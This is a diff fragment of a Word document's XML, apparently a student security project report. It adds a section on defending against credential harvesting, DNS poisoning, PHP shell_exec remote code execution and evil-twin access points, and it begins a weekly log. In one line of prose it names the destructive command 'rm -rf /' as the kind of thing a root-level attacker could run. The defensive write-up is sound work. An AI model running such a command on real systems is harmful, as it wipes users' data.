+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">efences Against Attacks </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">efend against </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>credential harvesting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>lways check the certificate of the website. A fake login webpage usually has no certificate and runs over HTTP, not HTTPS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Check your DNS settings. In our project, we use DNS poisoning, but we still need to modify the normal DNS address to our Raspberry Pi address. If you suspect your DNS is poisoned (e.g. fake page, low access speed or ads on webpages), then you can use nslookup command to see whether your DNS server has been changed. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">heck your cookie policy. In most of cases, if you do not clean the cookie, at least the username will prompt so you don’t need to re-type. But once you visit a fake login page, it will require you to input it, as cookie cannot be used cross-origin unless permitted. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">efend against </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>web-based exploit for remote arbitrary code execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">It is better not to permit shell code execution on webpage. In our project, a PHP shell_exec function is considered as “high-risky” that can execute codes even no reverse shells are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>explicitly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> running on terminal.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Grant less privileges for users and groups running PHP fpm and webserver. In our project, we grant privileges for PHP-fpm executers as root (Only for demo, otherwise it can only execute shells in web directory). This is risky, as remote code executer has the supreme privileges that can change anything, even “rm -rf /”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">f shell code execution is required in your web project, a strict authentication and execution privilege grants for certain commands should be provided. For example, a typical user can only use “ls” command and refuse any other commands by regex checking in PHP. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3 .  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>n</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> this situation, the evil twin AP is hard to detect as it is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>also</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve">  a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>legitimate</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>AP</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="29"/>
-          <w:szCs w:val="29"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  for defencing</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="29"/>
-          <w:szCs w:val="29"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> against attacks performed</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="29"/>
-          <w:szCs w:val="29"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, we can apply some </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">detect system that can find the evil twin AP, for example , we can use e wireless intrusion prevention systems (WIPS) to detect the presence of an evil twin AP and prevent any managed corporate clients from connecting to them. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">And also </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sing a VPN is also a good way to prevent an evil twin attack and protect users, but it will not necessarily stop users from connecting to the rogue access point. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>we</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> could disable the option to connect to unapproved wireless networks, but this could be a significant limitation for </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+        <w:t xml:space="preserve"> ,  for defen</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">cing </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:t>against attacks performed</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">we can apply some detect system that can find the evil twin AP, for example , we can use e wireless intrusion prevention systems (WIPS) to detect the presence of an evil twin AP and prevent any managed corporate clients from connecting to them. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>And also using a VPN is also a good way to prevent an evil twin attack and protect users, but it will not necessarily stop users from connecting to the rogue access point. we could disable the option to connect to unapproved wireless networks, but this could be a significant limitation for users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-AU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2438,8 +6958,30 @@
           <w:szCs w:val="37"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Weekly log</w:t>
-      </w:r>
+        <w:t>Weekly</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="52"/>
+          <w:szCs w:val="37"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="52"/>
+          <w:szCs w:val="37"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -2454,7 +6996,7 @@
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1374"/>
+          <w:trHeight w:val="1813"/>
           <w:jc w:val="center"/>
         </w:trPr>
         <w:tc>
@@ -2486,73 +7028,72 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t>LIU: find how to install the kali linux into raspberry Pi</w:t>
+              <w:t>W</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
                 <w:sz w:val="32"/>
-                <w:szCs w:val="37"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>find how to install the kali linux into raspberry Pi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
